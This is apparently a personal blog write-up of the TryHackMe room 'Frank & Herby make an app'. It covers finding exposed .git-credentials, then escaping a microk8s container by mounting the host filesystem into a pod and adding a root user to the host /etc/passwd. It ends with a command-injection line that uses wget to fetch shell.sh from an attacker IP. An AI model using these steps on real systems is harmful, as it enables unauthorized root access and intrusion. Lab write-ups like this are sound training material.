THM: Frank & Herby
It’s been a month; really. What have I been doing in all this time? Stuff, but nothing worth noting. I’ve done some VulnHub boxes, some RootMe stuff, a bit of THM and a few other things but nothing worth making any particular notes about. But, this one was a bit more novel so here goes. This is Frank & Herby make an app, which is Medium rated.
We get a few clues in the description and questions:
Learn how the misconfiguration of containers can lead to opportunities for some and disasters for others.
Containers are really cool, but they have security considerations just like everything else. Break into the box and then figure out how to get root access!
This box will require some research into how to use microk8s.
Our story so far….
Two developers are venturing into the world of Kubernetes. Little do these developers know that their lack of understanding in ‘k8s’, containers, and git has left their resources open to exploitation!
And the questions?
- What port has a webpage frank was able to stand up?
- What did frank leave exposed on the site?
- What is the user.txt flag?
- What is the root.txt flag?
Wow, we’ve got a bit to unpack here. We know we’re looking for something on a website, and we’ll be playing with Kubernetes, which I know very little about.
We’ll skip over the first part, because frankly it’s not that interesting. The file we want is .git-credentials and it’s on a website on Port 31337, which I found very easily with some enum. .git-credentials is url-encoded but once we decode it we have creds for frank and we can SSH in.
To start with I blundered about in the dark, but eventually I figured this out. Rather than outline my mistakes, I’ll cut to the chase. We can list the pods available:
NAMESPACE | NAME | READY | STATUS | RESTARTS | AGE |
---|---|---|---|---|---|
container-registry | registry-9b57d9df8-2qbbs | 1/1 | Running | 8 | 34d |
kube-system | hostpath-provisioner-5c65fbdb4f-29k5w | 1/1 | Running | 8 | 34d |
default | nginx-deployment-7b548976fd-77v4r | 1/1 | Running | 2 | 10d |
kube-system | coredns-7f9c69c78c-hpsnw | 1/1 | Running | 7 | 34d |
kube-system | calico-node-6595k | 1/1 | Running | 8 | 34d |
kube-system | calico-kube-controllers-f7868dd95-xkk4w | 1/1 | Running | 8 | 34d |
So essentially we only have one container of interest; nginx. This article describes the technique we’re going to use. We need to edit or create a yaml file; I choose to start with the existing one that was used to deploy the pod in the first place. As it happens, it’s this one:
We can pretty much use the example provided at the link above, except the image name is nginx and we have to provide the IP/port per the original test.yaml (which I copied to old.yaml). I could show it here but I forgot to cat the files before the box closed, so you’ll have to take my word for it. The reason we can’t just use:
image: ubuntu:latest
from the provided example is that it tries to pull from an online repo and the box doesn’t have an internet connection. We might be able to host an image ourselves….hmmm. Anyway we can use the nginx one just fine. Next we do:
And if we run-run
microk8s.kubectl get pods -A
we have a new pod in addition to the other ones:
NAMESPACE | NAME | READY | STATUS | RESTARTS | AGE |
---|---|---|---|---|---|
default | hostmount | 1/1 | Running | 0 | 4m6s |
Goodo. Next it’s:
or some variation thereof; the example from the article:
microk8s.kubectl exec -it hostmount /bin/bash
does not work.
This one does though:
microk8s.kubectl exec -it hostmount -- /bin/bash
Syntax eh.
Once we are there, we can go to /opt/root and find the root filesystem; I add good old root2 to /etc/passwd:
Note! Pay close attention to the directory I was in: root@hostmount:/opt/root/etc. Going to /etc will not work, because that is for the container and not where the host is mounted. Anyway this was interesting which is why I’m recording it here.
Also I did Minotaur’s Labyrinth but there wasn’t anything too novel there. Except for the fact that wget doesn’t need http:// so you can defeat a regex with it; maybe I’ll write it up….maybe not.
wget+10.9.10.123/shell.sh+-O+/tmp/shell.sh